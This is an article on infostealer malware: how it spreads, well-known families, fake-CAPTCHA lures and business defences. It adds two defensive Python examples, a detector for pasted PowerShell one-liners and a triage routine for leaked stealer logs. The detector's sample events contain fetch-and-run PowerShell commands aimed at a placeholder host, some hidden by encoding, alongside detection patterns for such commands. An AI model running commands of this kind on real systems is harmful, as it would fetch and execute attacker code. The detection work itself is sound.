Infostealer malware: What’s the threat to businesses?


Infostealers have been around for some time but recently they’ve been making headlines. This class of malware, built to compromise victims’ systems and exfiltrate sensitive information such as saved passwords and session cookies, is on the rise and poses an active threat to all businesses.

A recent report found that infostealers exposed billions of credentials in 2024, with KELA Cyber Threat Intelligence measuring 4.3 million machines infected with the malware around the world.

Credentials harvested by infostealers were behind headline-grabbing attacks in the past year, such as the Snowflake customer data breach, and an infostealer infection sometimes comes as a precursor to a ransomware attack.

So how big is the threat posed by infostealers and what needs to be done to protect against them?

Infostealers at work

Infostealers are malicious programs designed to extract sensitive data, such as passwords, session cookies and authentication tokens. Their goal is clear: to gain access to accounts, platforms or corporate networks, says Axel Maisonneuve, technical education contributor at BSV Association.

He calls infostealers “highly effective” due to their “small size, speed and ability to operate stealthily” – which means they often go undetected.

Infostealers typically arrive via phishing emails, compromised URLs, infected downloads, or flaws in software and operating systems, explains Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster University.

“Once on the device, the malware looks for certain kinds of information, including browser passwords, autofill data such as credit card numbers and addresses, cryptocurrency wallet data, system data and session cookies for accounts currently logged in. After collecting the information, the malware sends the data to an attacker-controlled server, or makes it available for download.”

Once extracted, the stolen data is often packaged up as “logs” (per-victim bundles of credentials, cookies and system details) and sold on an auto shop – a dark web marketplace that specializes in the sale of digital products – for a relatively small price.

However, particularly valuable stolen data can be sold for several hundred dollars, says Robert Fitzsimons, lead threat intelligence engineer at Searchlight Cyber. “Similarly, information can be disseminated on platforms including Telegram and dark web hacker forums to be used by other threat actors such as ransomware groups during the reconnaissance phase of further attacks.”

Infostealers are now widely accessible thanks to the rise of the malware as a service (MaaS) model, says Maisonneuve. “Platforms such as Raccoon Stealer and Redline are available via subscription in underground forums, while advanced persistent threat (APT) groups use them for large-scale espionage.”

Infostealer examples

One of the most well-known examples of an infostealer is Emotet, which initially started as a banking Trojan but evolved into a powerful infostealing tool. “Emotet’s capabilities have enabled large-scale ransomware operations, making it infamous in the cybersecurity landscape,” says Dray Agha, senior manager of security operations at Huntress.

Another emerging example is Lumma Stealer, a more recent malware variant. “Lumma Stealer is notable for its ability to capture information related to multi-factor authentication (MFA), undermining critical layers of security and leaving victims exposed to further attacks,” Agha explains.

An increasing number of infostealer campaigns are leveraging fake CAPTCHA pages to deliver Lumma Stealer malware, says Stefan Tenase, cyber intelligence expert at CSIS. “While thinking they are solving a CAPTCHA to prove they are human, victims are duped into pasting malicious PowerShell code into their systems, showcasing how simple yet effective social engineering tactics can be.”
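The fake-CAPTCHA lure described above ends with a PowerShell one-liner pasted into the Run box, and that pasted command is the point where defenders can catch it. The following is an added example, not code from the article or from CSIS: a small scorer for process-creation telemetry that looks for the traits such a one-liner relies on (fetching from the internet, running what it fetched, hiding the window, bypassing the execution policy, or wrapping all of that in -EncodedCommand) and for an interactive launch from explorer.exe. The field names follow Sysmon Event ID 1; the events and host names are constructed for the example.

```python
"""Flag ClickFix-style command lines in process-creation telemetry.

Added example for this article; not code from the page or from any vendor
quoted in it. Assumes events arrive as dicts carrying "CommandLine" and
"ParentImage" fields (the names Sysmon Event ID 1 uses); the events below
are constructed for the example, and the host names are not real.
"""
import base64
import re

# Traits of a pasted "verify you are human" one-liner. Each is a weak
# signal on its own; the verdict needs a fetch plus at least one more.
INDICATORS = [
    ("remote_fetch", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)),
    ("exec_text", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("hidden_window", re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("mshta_url", re.compile(r"\bmshta(?:\.exe)?\s+['\"]?https?://", re.I)),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or ""."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(event):
    """Return (verdict, indicator names) for one process-creation event.

    The command line is scanned both as written and after decoding any
    -EncodedCommand payload, so the encoding does not hide the fetch-and-run.
    """
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    if decoded:
        hits.append("encoded")
    # A shell whose parent is explorer.exe was started interactively (Run
    # box, Start menu), which is how a pasted command arrives; scheduled
    # tasks and management agents have other parents.
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("\\explorer.exe") and re.search(r"powershell|pwsh|mshta|cmd\.exe", cmd, re.I):
        hits.append("interactive_launch")
    fetches = "remote_fetch" in hits or "mshta_url" in hits
    verdict = "suspicious" if fetches and len(hits) >= 2 else "benign"
    return verdict, hits


# Constructed sample events (not real telemetry). The encoded payload is
# built here so the example stays self-contained.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {   # pasted from a fake CAPTCHA page into the Run box
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/verify.txt | iex"',
    },
    {   # same idea, hidden behind -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENCODED,
    },
    {   # routine admin command from a management agent
        "ParentImage": r"C:\Program Files\Agent\agent.exe",
        "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    },
    {   # scheduled maintenance script: bypass alone is not enough to alert on
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, hits = analyse(ev)
        print(f"{verdict:10} {', '.join(hits) or '-':60} {ev['CommandLine'][:50]}")
```

The scorer deliberately refuses to alert on an execution-policy bypass or a hidden window by itself, because legitimate scheduled scripts use both; it is the combination of an internet fetch with a second trait, or an interactive launch, that makes the pasted command stand out. In a real deployment the same logic would run over Sysmon or 4688 events exported from the SIEM rather than the constructed list.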

John Flatley, consulting solutions architect at Barracuda, describes how the firm recently observed a phishing campaign delivering a sophisticated infostealer capable of collecting extensive data, including browser session cookies, saved credit card details, cryptocurrency wallet extensions and PDF files. “The attack started with a phishing email and unfolded in stages to finally reveal the obfuscated infostealer malware.

“Once deployed, the infostealer exfiltrated the sensitive information to attacker-controlled email accounts for selling onwards, or for financial theft or lateral movement within an organization.”

Prashant Kumar, X-Labs security researcher at Forcepoint, describes how the firm’s research teams have seen increased activity from a new infostealer targeting businesses called VIPKeyLogger, which circulates through phishing campaigns as an attachment. “Opening the attachment leads to a sequence of events that ultimately ends up with data exfiltration such as recording keystrokes and collecting information including clipboard data, screenshots and browser history.”

Another campaign that circulated over the holiday season used the Rhadamanthys stealer, which masquerades as travel industry emails, says Kumar. “Clicking the documents triggers a chain of downloads and obfuscated scripts to steal user credentials and cryptocurrency wallet data.”

Protecting your business from infostealers

The threat from infostealers is growing, but thankfully, there are tools and techniques to avoid being hit.

Defending against infostealers requires a comprehensive approach to cybersecurity, emphasizing preventative measures and advanced tools, says Agha. One critical part of this is security awareness training, which helps employees recognize and avoid common attack methods such as phishing attempts and malicious links, he says.

It's also important to use antivirus and anti-malware solutions with real-time scanning capabilities, says Curran. “These act to detect and block malware, including spyware and keyloggers.”

Trusted password managers are “essential for generating and securely storing strong, unique passwords”, he says. However, he warns that storing passwords directly in browsers can make them vulnerable to infostealer attacks.

Once they're inside your organization, infostealers can be difficult to spot. With this in mind, Fitzsimons advises monitoring dark web forums for stolen data logs related to your company. “This means you can more easily identify the compromised device, where the infostealer is installed and when it was infected. You can then take quick action to contain its spread within your network.”
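Acting on a stolen log found in the way Fitzsimons describes means pulling three things out of it: which machine was infected and when, which of the credentials belong to the company, and which corporate passwords have also been reused elsewhere. The following is an added example, not code from the article or from Searchlight Cyber: a triage routine for a single log. It assumes the simplified key/value layout shown (a machine header followed by URL/USER/PASS triples), which mirrors the text dumps commonly seen in stealer logs; the log, host name, IP and company domain are all constructed.

```python
"""Triage one leaked infostealer log against a company's own domains.

Added example for this article; not code from the page or from Searchlight
Cyber. Assumes the simplified key/value layout below (a machine header
followed by URL/USER/PASS triples), which mirrors the text dumps commonly
seen in stealer logs; the log, host, IP and domain are constructed.
"""
import hashlib
from urllib.parse import urlsplit

SAMPLE_LOG = """\
MachineName: DESKTOP-7K2Q9
IP: 203.0.113.24
Date: 2024-11-03 14:22:10
===== Passwords =====
URL: https://sso.acme-example.com/login
USER: alice@acme-example.com
PASS: Hunter2!
URL: https://www.netflix.com/login
USER: alice.personal@example.net
PASS: Hunter2!
URL: https://vpn.acme-example.com
USER: acme-example\\alice
PASS: Hunter2!
"""

COMPANY_DOMAINS = {"acme-example.com"}


def parse_stealer_log(text):
    """Split the dump into (header fields, credential records), in file order."""
    meta, creds, cur = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line or line.startswith("="):
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().upper(), value.strip()
        if key == "URL":
            cur = {"url": value, "user": "", "pass": ""}
            creds.append(cur)
        elif key in ("USER", "PASS") and cur is not None:
            cur[key.lower()] = value
        elif cur is None:
            meta[key] = value
    return meta, creds


def host_in_scope(host, domains):
    """True for the domain itself or any subdomain; never for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def account_in_scope(user, domains):
    """True for user@domain or DOMAIN\\user forms belonging to the company."""
    u = user.lower()
    if "@" in u:
        return u.rsplit("@", 1)[1] in domains
    if "\\" in u:
        return u.split("\\", 1)[0] in {d.split(".")[0] for d in domains}
    return False


def triage(text, domains):
    """Return what a defender needs: which machine, when, and which creds to rotate."""
    meta, creds = parse_stealer_log(text)
    reasons = []
    for c in creds:
        host = urlsplit(c["url"]).hostname or ""
        r = []
        if host_in_scope(host, domains):
            r.append("corporate service")
        if account_in_scope(c["user"], domains):
            r.append("corporate account")
        reasons.append(r)
    # A corporate password that also unlocks a personal site widens the
    # blast radius, so flag reuse even where the site itself is out of scope.
    corp_passwords = {c["pass"] for c, r in zip(creds, reasons) if r}
    for c, r in zip(creds, reasons):
        if not r and c["pass"] in corp_passwords:
            r.append("corporate password reused")
    exposed = [
        {"url": c["url"], "user": c["user"], "reasons": r,
         # fingerprint instead of the secret, so the report can be shared
         "pass_fp": hashlib.sha256(c["pass"].encode()).hexdigest()[:8]}
        for c, r in zip(creds, reasons) if r
    ]
    return {"machine": meta.get("MACHINENAME"), "ip": meta.get("IP"),
            "date": meta.get("DATE"), "exposed": exposed}


if __name__ == "__main__":
    report = triage(SAMPLE_LOG, COMPANY_DOMAINS)
    print(f"{report['machine']} ({report['ip']}) infected {report['date']}")
    for e in report["exposed"]:
        print(f"  {e['user']:28} {e['url']:40} {'; '.join(e['reasons'])}")
```

The machine name and infection date are what the help desk needs to find and isolate the endpoint, while the exposed list drives the credential rotation; the fingerprint lets two logs be compared for the same password without the report itself carrying the secret. Note that the session cookies a stealer takes are not in this dump, so rotating passwords alone is not enough: active sessions for the flagged services should be revoked as well.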

Keeping software and systems up to date is also important to avoid being impacted by infostealers, says Agha. “Regular updates and patching help close the vulnerabilities attackers often exploit to deploy malware. Additionally, implementing strong authentication practices, such as MFA, adds an extra layer of security. Even if login credentials are compromised, MFA can prevent unauthorized access to critical systems.”

Kate O'Flaherty

Kate O'Flaherty is a freelance journalist with well over a decade's experience covering cyber security and privacy for publications including Wired, Forbes, the Guardian, the Observer, Infosecurity Magazine and the Times. Within cyber security and privacy, her specialist areas include critical national infrastructure security, cyber warfare, application security and regulation in the UK and the US amid increasing data collection by big tech firms such as Facebook and Google. You can follow Kate on Twitter.